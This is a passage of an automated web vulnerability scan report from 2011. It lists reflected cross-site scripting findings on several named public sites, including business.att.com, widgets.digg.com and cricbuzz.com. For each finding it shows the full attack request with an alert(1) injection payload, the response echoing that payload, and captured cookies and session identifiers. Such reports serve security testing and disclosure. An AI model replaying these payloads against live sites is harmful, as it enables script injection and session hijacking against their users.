Host:   http://track.blvdstatus.com
Path:   /js/track.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5949b'%3balert(1)//02a670cbde0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5949b';alert(1)//02a670cbde0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/track.php?tid=BS-45e605/5949b'%3balert(1)//02a670cbde0ae-1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: track.blvdstatus.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:49:54 GMT
Server: Apache
Content-Type: text/javascript
Content-Length: 8897

//-- BLVD Status tracker
//-- Copyright 2010 BLVD Status, All Rights Reserved.

//BLVD tracking object
function BLVD() {
   
//params
this.host = 'http://hit.blvdstatus.com';
this.tid = 'BS-45e605/5949b';alert(1)//02a670cbde0ae-1';

   //set cookie
var blvdCookie = this._Get_Cookie('blvdS');
if(blvdCookie) {
this._Set_Cookie('blvdS', blvdCookie, 30,'/');
} else {
blvdCookie = 's45e4dbe1bd2893c
...[SNIP]...

7.35. http://track.blvdstatus.com/js/track.php [tid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://track.blvdstatus.com
Path:   /js/track.php

Issue detail

The value of the tid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb3ab'%3balert(1)//fe30191df11 was submitted in the tid parameter. This input was echoed as fb3ab';alert(1)//fe30191df11 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/track.php?tid=BS-45e605ae-1fb3ab'%3balert(1)//fe30191df11 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: track.blvdstatus.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:48:48 GMT
Server: Apache
Content-Type: text/javascript
Content-Length: 8896

//-- BLVD Status tracker
//-- Copyright 2010 BLVD Status, All Rights Reserved.

//BLVD tracking object
function BLVD() {
   
//params
this.host = 'http://hit.blvdstatus.com';
this.tid = 'BS-45e605ae-1fb3ab';alert(1)//fe30191df11';

   //set cookie
var blvdCookie = this._Get_Cookie('blvdS');
if(blvdCookie) {
this._Set_Cookie('blvdS', blvdCookie, 30,'/');
} else {
blvdCookie = 's45e4dbe1b907640c3.6
...[SNIP]...

7.36. http://usjobsresource.com/3 [s parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usjobsresource.com
Path:   /3

Issue detail

The value of the s request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50e48"><script>alert(1)</script>e6cfb5723ff was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /3?s=31s-2100u50e48"><script>alert(1)</script>e6cfb5723ff HTTP/1.1
Host: usjobsresource.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:33:06 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15249


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<input type="hidden" name="sub_id" id="page_subid" value="31s-2100u50e48"><script>alert(1)</script>e6cfb5723ff" />
...[SNIP]...

7.37. http://usjobsresource.com/3/ [s parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usjobsresource.com
Path:   /3/

Issue detail

The value of the s request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32f1f"><script>alert(1)</script>6df8703c622 was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3/?s=31s-2100u32f1f"><script>alert(1)</script>6df8703c622 HTTP/1.1
Host: usjobsresource.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:33:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15249


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<input type="hidden" name="sub_id" id="page_subid" value="31s-2100u32f1f"><script>alert(1)</script>6df8703c622" />
...[SNIP]...

7.38. http://widgets.digg.com/buttons/count [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 24218<script>alert(1)</script>e84fc8187f6 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=file%3A///D%3A/cdn/examples/dork/http-injection/http-header-injection-dork-cwe-113-march-8-2011.html24218<script>alert(1)</script>e84fc8187f6 HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: traffic_control=-781655937076164456%3A203; d=fb1af30888f0820a9f09d171b75eb93394e3b17bd833ffed352d5b5c4836e393; __utmz=146621099.1304250250.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vnum=1306842255367%26vn%3D1; s_vi=[CS]v1|26DEA3D10501174B-40000100A00037A2[CE]; imp_id=1f0886feeb8786a6bbd1a6e1e240cbe5d902a47b7a6b64c4656307739e35a482; __utma=146621099.2000529129.1304250250.1304250250.1304250250.1; s_nr=1304250295878

Response

HTTP/1.1 200 OK
Age: 0
Date: Sun, 01 May 2011 23:25:30 GMT
Via: NS-CACHE: 100
Etag: "600917dcebe2f17e666a47431399dbfb32a9afc9"
Content-Length: 181
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Sun, 01 May 2011 23:35:29 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "file:///D:/cdn/examples/dork/http-injection/http-header-injection-dork-cwe-113-march-8-2011.html24218<script>alert(1)</script>e84fc8187f6", "diggs": 0});

7.39. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [GUID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.business.att.com
Path:   /enterprise/Family/network-security/threat-vulnerability-management/

Issue detail

The value of the GUID request parameter is copied into an HTML comment. The payload 3f483--><script>alert(1)</script>0979b4e1029 was submitted in the GUID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C43523f483--><script>alert(1)</script>0979b4e1029&WT.srch=1 HTTP/1.1
Host: www.business.att.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; svariants=NA; ECOM_GTM=owaln_osaln; bn_u=6923522882713032529; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; DTAB=Tab=Bus; colam_ctn=l%3Den_US; browserid=A001533839947

Response

HTTP/1.1 200 OK
Last-Modified: Sun, 01 May 2011 23:34:43 GMT
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 01 May 2011 23:34:43 GMT
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
Cache-Control: max-age=0, proxy-revalidate, private
X-atg-version: ATGPlatform/2006.3p5,CAF/2006.3,ACO/2006.3 [ DASLicense/0 DPSLicense/0 DSSLicense/0 ]
Set-Cookie: JSESSIONID=LPNFFQCT4WHVHB4U3SIB5VQ; domain=business.att.com; path=/
Set-Cookie: JROUTE=p1ba; domain=business.att.com; path=/
Set-Cookie: DYN_USER_ID=207601853; domain=business.att.com; path=/
Set-Cookie: DYN_USER_CONFIRM=38f57a3139fe3100e934be119a8bde04; domain=business.att.com; path=/
X-Cache: MISS from 12.120.78.31
Via: 1.1 12.120.78.31:80 (cache/2.6.2.2.16.ATT)
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equ
...[SNIP]...
=ProductSub-Category&repoitem=threat-vulnerability-management&serv_port=network-security&serv_fam=threat-vulnerability-management&segment=ent_biz&lastrule=true&GUID=F7BA3C75-6B83-4966-96A6-0F35574C43523f483--><script>alert(1)</script>0979b4e1029&WT.srch=1 -->
...[SNIP]...

7.40. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.business.att.com
Path:   /enterprise/Family/network-security/threat-vulnerability-management/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 283a6"><script>alert(1)</script>97891412ffe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /enterprise/Family/network-security283a6"><script>alert(1)</script>97891412ffe/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1 HTTP/1.1
Host: www.business.att.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; svariants=NA; ECOM_GTM=owaln_osaln; bn_u=6923522882713032529; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; DTAB=Tab=Bus; colam_ctn=l%3Den_US; browserid=A001533839947

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 02 May 2011 00:01:20 GMT
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 02 May 2011 00:01:20 GMT
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
Cache-Control: max-age=0, proxy-revalidate, private
X-atg-version: ATGPlatform/2006.3p5,CAF/2006.3,ACO/2006.3 [ DASLicense/0 DPSLicense/0 DSSLicense/0 ]
Set-Cookie: JSESSIONID=LZOJUPGBKPSHXB4U3SICAOQ; domain=business.att.com; path=/
Set-Cookie: JROUTE=p1ba; domain=business.att.com; path=/
Set-Cookie: DYN_USER_ID=207610536; domain=business.att.com; path=/
Set-Cookie: DYN_USER_CONFIRM=ecd6ef2ba3674bc7ffa69ff03589f6ed; domain=business.att.com; path=/
X-Cache: MISS from 12.120.79.17
Via: 1.1 12.120.79.17:80 (cache/2.6.2.2.16.ATT)
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equ
...[SNIP]...
<link rel="canonical" href="http://www.business.att.com/enterprise/Family/network-security283a6"><script>alert(1)</script>97891412ffe/threat-vulnerability-management/"/>
...[SNIP]...

7.41. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.business.att.com
Path:   /enterprise/Family/network-security/threat-vulnerability-management/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9cfc'-alert(1)-'062611d0003 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /enterprise/Family/network-securityb9cfc'-alert(1)-'062611d0003/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1 HTTP/1.1
Host: www.business.att.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; svariants=NA; ECOM_GTM=owaln_osaln; bn_u=6923522882713032529; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; DTAB=Tab=Bus; colam_ctn=l%3Den_US; browserid=A001533839947

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 02 May 2011 00:02:29 GMT
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 02 May 2011 00:02:29 GMT
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
Cache-Control: max-age=0, proxy-revalidate, private
X-atg-version: ATGPlatform/2006.3p5,CAF/2006.3,ACO/2006.3 [ DASLicense/0 DPSLicense/0 DSSLicense/0 ]
Set-Cookie: JSESSIONID=ZIAJEFC04ES2VB4U3SIR5VQ; domain=business.att.com; path=/
Set-Cookie: JROUTE=p1ba; domain=business.att.com; path=/
Set-Cookie: DYN_USER_ID=207579685; domain=business.att.com; path=/
Set-Cookie: DYN_USER_CONFIRM=2cfd5fa64eb3b601400f181ff3de6124; domain=business.att.com; path=/
X-Cache: MISS from 12.120.79.18
Via: 1.1 12.120.79.18:80 (cache/2.6.2.2.16.ATT)
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equ
...[SNIP]...
<s'+'cript language="javascript" src="http://view.atdmt.com/jaction/cntwir_ServiceFamilyOverview_1/v3/ato.001/[atc1.ProductSub-Category/atc2.threat-vulnerability-management/atc3.network-securityb9cfc'-alert(1)-'062611d0003]">
...[SNIP]...

7.42. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.business.att.com
Path:   /enterprise/Family/network-security/threat-vulnerability-management/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69ba2"-alert(1)-"91dbea1c28a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /enterprise/Family/network-security69ba2"-alert(1)-"91dbea1c28a/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1 HTTP/1.1
Host: www.business.att.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; svariants=NA; ECOM_GTM=owaln_osaln; bn_u=6923522882713032529; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; DTAB=Tab=Bus; colam_ctn=l%3Den_US; browserid=A001533839947

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 02 May 2011 00:01:54 GMT
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 02 May 2011 00:01:54 GMT
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
Cache-Control: max-age=0, proxy-revalidate, private
X-atg-version: ATGPlatform/2006.3p5,CAF/2006.3,ACO/2006.3 [ DASLicense/0 DPSLicense/0 DSSLicense/0 ]
Set-Cookie: JSESSIONID=VYIV31SYKK2S1B4U3SICAOQ; domain=business.att.com; path=/
Set-Cookie: JROUTE=p1ba; domain=business.att.com; path=/
Set-Cookie: DYN_USER_ID=207610540; domain=business.att.com; path=/
Set-Cookie: DYN_USER_CONFIRM=fc845523bb479e8fe404a8b911a72926; domain=business.att.com; path=/
X-Cache: MISS from 12.120.79.63
Via: 1.1 12.120.79.63:80 (cache/2.6.2.2.16.ATT)
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equ
...[SNIP]...
TTCampaign=EMPTY";
_cp_custom_array[n++]="ATTSource=null";
_cp_custom_array[n++]="ATTEBSegment=null";
_cp_custom_array[n++]="ATTECampaignID=null";
_cp_custom_array[n++]="ATTServicePort=network-security69ba2"-alert(1)-"91dbea1c28a";
_cp_custom_array[n++]="ATTCType=ProductSub-Category";
_cp_custom_array[n++]="ATTCValue=threat-vulnerability-management";
/** FR-ABS_0402 Remove Intellakey
_cp_cc='ATT';
_cp_pc='ATT101';
_cp_chc='ATT
...[SNIP]...

7.43. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [WT.srch parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.business.att.com
Path:   /enterprise/Family/network-security/threat-vulnerability-management/

Issue detail

The value of the WT.srch request parameter is copied into an HTML comment. The payload d5e22--><script>alert(1)</script>9c70c127f7e was submitted in the WT.srch parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1d5e22--><script>alert(1)</script>9c70c127f7e HTTP/1.1
Host: www.business.att.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; svariants=NA; ECOM_GTM=owaln_osaln; bn_u=6923522882713032529; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; DTAB=Tab=Bus; colam_ctn=l%3Den_US; browserid=A001533839947

Response

HTTP/1.1 200 OK
Last-Modified: Sun, 01 May 2011 23:35:06 GMT
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 01 May 2011 23:35:06 GMT
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
Cache-Control: max-age=0, proxy-revalidate, private
X-atg-version: ATGPlatform/2006.3p5,CAF/2006.3,ACO/2006.3 [ DASLicense/0 DPSLicense/0 DSSLicense/0 ]
Set-Cookie: JSESSIONID=1YST0KTJBXSXPB4U3SICAOQ; domain=business.att.com; path=/
Set-Cookie: JROUTE=p1ba; domain=business.att.com; path=/
Set-Cookie: DYN_USER_ID=207610337; domain=business.att.com; path=/
Set-Cookie: DYN_USER_CONFIRM=faa58d0946d2d8a634695d2e0591c56e; domain=business.att.com; path=/
X-Cache: MISS from 12.120.78.31
Via: 1.1 12.120.78.31:80 (cache/2.6.2.2.16.ATT)
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equ
...[SNIP]...
b-Category&repoitem=threat-vulnerability-management&serv_port=network-security&serv_fam=threat-vulnerability-management&segment=ent_biz&lastrule=true&GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1d5e22--><script>alert(1)</script>9c70c127f7e -->
...[SNIP]...

7.44. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.business.att.com
Path:   /enterprise/Family/network-security/threat-vulnerability-management/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 4bdf4--><script>alert(1)</script>c023ff8d913 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1&4bdf4--><script>alert(1)</script>c023ff8d913=1 HTTP/1.1
Host: www.business.att.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; svariants=NA; ECOM_GTM=owaln_osaln; bn_u=6923522882713032529; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; DTAB=Tab=Bus; colam_ctn=l%3Den_US; browserid=A001533839947

Response

HTTP/1.1 200 OK
Last-Modified: Sun, 01 May 2011 23:37:46 GMT
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 01 May 2011 23:37:46 GMT
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
Cache-Control: max-age=0, proxy-revalidate, private
X-atg-version: ATGPlatform/2006.3p5,CAF/2006.3,ACO/2006.3 [ DASLicense/0 DPSLicense/0 DSSLicense/0 ]
Set-Cookie: JSESSIONID=XYNLIASLF0LPVB4U3SIB5VQ; domain=business.att.com; path=/
Set-Cookie: JROUTE=p1ba; domain=business.att.com; path=/
Set-Cookie: DYN_USER_ID=207601953; domain=business.att.com; path=/
Set-Cookie: DYN_USER_CONFIRM=19f0450799003a67ffb066dd0f0d8e8b; domain=business.att.com; path=/
X-Cache: MISS from 12.120.78.32
Via: 1.1 12.120.78.32:80 (cache/2.6.2.2.16.ATT)
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equ
...[SNIP]...
-Category&repoitem=threat-vulnerability-management&serv_port=network-security&serv_fam=threat-vulnerability-management&segment=ent_biz&lastrule=true&GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1&4bdf4--><script>alert(1)</script>c023ff8d913=1 -->
...[SNIP]...

7.45. http://www.cricbuzz.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cricbuzz.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a5743<script>alert(1)</script>01a55c78f8d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoa5743<script>alert(1)</script>01a55c78f8d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cricbuzz.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 CHttpException
Server: nginx
Date: Mon, 02 May 2011 00:08:27 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 15660
X-Varnish: 542435555
Age: 0
Via: 1.1 varnish
X-Served-By: garner.cricbuzz.com
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml"
...[SNIP]...
<strong> Unable to resolve the request "favicon.icoa5743<script>alert(1)</script>01a55c78f8d".</strong>
...[SNIP]...

7.46. http://www.ibegin.com/weather/weather_widget.php [background_color parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the background_color request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 69b10%3balert(1)//368093ffe90 was submitted in the background_color parameter. This input was echoed as 69b10;alert(1)//368093ffe90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff69b10%3balert(1)//368093ffe90&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:48:49 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1589


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

